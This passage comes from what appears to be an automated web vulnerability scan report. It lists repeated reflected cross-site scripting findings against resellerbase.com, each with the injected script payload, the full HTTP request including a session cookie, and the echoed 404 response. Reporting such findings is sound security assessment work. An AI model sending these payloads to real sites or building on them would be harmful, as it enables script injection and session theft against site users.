Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes87359<script>alert(1)</script>7328addab8d/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.3038. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3ee53<script>alert(1)</script>0aed6a1f60c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos3ee53<script>alert(1)</script>0aed6a1f60c/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos3ee53<script>alert(1)</script>0aed6a1f60c/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.3039. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f1e59<script>alert(1)</script>3fa310bdaa5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/imagesf1e59<script>alert(1)</script>3fa310bdaa5/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/imagesf1e59<script>alert(1)</script>3fa310bdaa5/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.3040. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 90593<script>alert(1)</script>a42c0aed50d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/images/rating90593<script>alert(1)</script>a42c0aed50d/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images/rating90593<script>alert(1)</script>a42c0aed50d/0.gif was not found on this server.</p>
...[SNIP]...

2.3041. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/0.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload b9c34<script>alert(1)</script>c3e8127a812 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/images/rating/0.gifb9c34<script>alert(1)</script>c3e8127a812 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images/rating/0.gifb9c34<script>alert(1)</script>c3e8127a812 was not found on this server.</p>
...[SNIP]...

2.3042. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e77d2<script>alert(1)</script>2e1c315fcb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/images/rating/0.gif?e77d2<script>alert(1)</script>2e1c315fcb9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images/rating/0.gif?e77d2<script>alert(1)</script>2e1c315fcb9=1 was not found on this server.</p>
...[SNIP]...

2.3043. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7b4c9<script>alert(1)</script>a524b9df05c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail7b4c9<script>alert(1)</script>a524b9df05c/42/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail7b4c9<script>alert(1)</script>a524b9df05c/42/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3044. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6561d<script>alert(1)</script>dfb6f313402 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/426561d<script>alert(1)</script>dfb6f313402/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/426561d<script>alert(1)</script>dfb6f313402/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3045. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 167fd<script>alert(1)</script>58a64847593 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes167fd<script>alert(1)</script>58a64847593/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes167fd<script>alert(1)</script>58a64847593/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3046. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 84d6e<script>alert(1)</script>999d72fdd42 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos84d6e<script>alert(1)</script>999d72fdd42/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos84d6e<script>alert(1)</script>999d72fdd42/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3047. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 47e37<script>alert(1)</script>682a07430a7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/images47e37<script>alert(1)</script>682a07430a7/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images47e37<script>alert(1)</script>682a07430a7/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3048. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload cdf71<script>alert(1)</script>eda95a0b384 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/images/ratingcdf71<script>alert(1)</script>eda95a0b384/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images/ratingcdf71<script>alert(1)</script>eda95a0b384/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3049. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 1ef7a<script>alert(1)</script>92783dad45c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/images/rating/search.php1ef7a<script>alert(1)</script>92783dad45c?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images/rating/search.php1ef7a<script>alert(1)</script>92783dad45c?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3050. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload b6d0b<a>78a153673eb was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/42/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchb6d0b<a>78a153673eb&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchb6d0b<a>78a153673eb&opt=2 was not found on this server.</p>
...[SNIP]...

2.3051. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 258f5<a>fab19fd6f was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/42/themes/kosmos/images/rating/search.php?keyword=search...258f5<a>fab19fd6f&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images/rating/search.php?keyword=search...258f5<a>fab19fd6f&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3052. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 84c97<script>alert(1)</script>a0b19956e5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&84c97<script>alert(1)</script>a0b19956e5b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&84c97<script>alert(1)</script>a0b19956e5b=1 was not found on this server.</p>
...[SNIP]...

2.3053. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload b8207<a>587b09be20a was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/42/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2b8207<a>587b09be20a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2b8207<a>587b09be20a was not found on this server.</p>
...[SNIP]...

2.3054. http://www.resellerbase.com/detail/42/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3fa22<script>alert(1)</script>2a8bbe813e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail3fa22<script>alert(1)</script>2a8bbe813e/42/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail3fa22<script>alert(1)</script>2a8bbe813e/42/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3055. http://www.resellerbase.com/detail/42/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 193a4<script>alert(1)</script>bea865d50b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42193a4<script>alert(1)</script>bea865d50b0/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
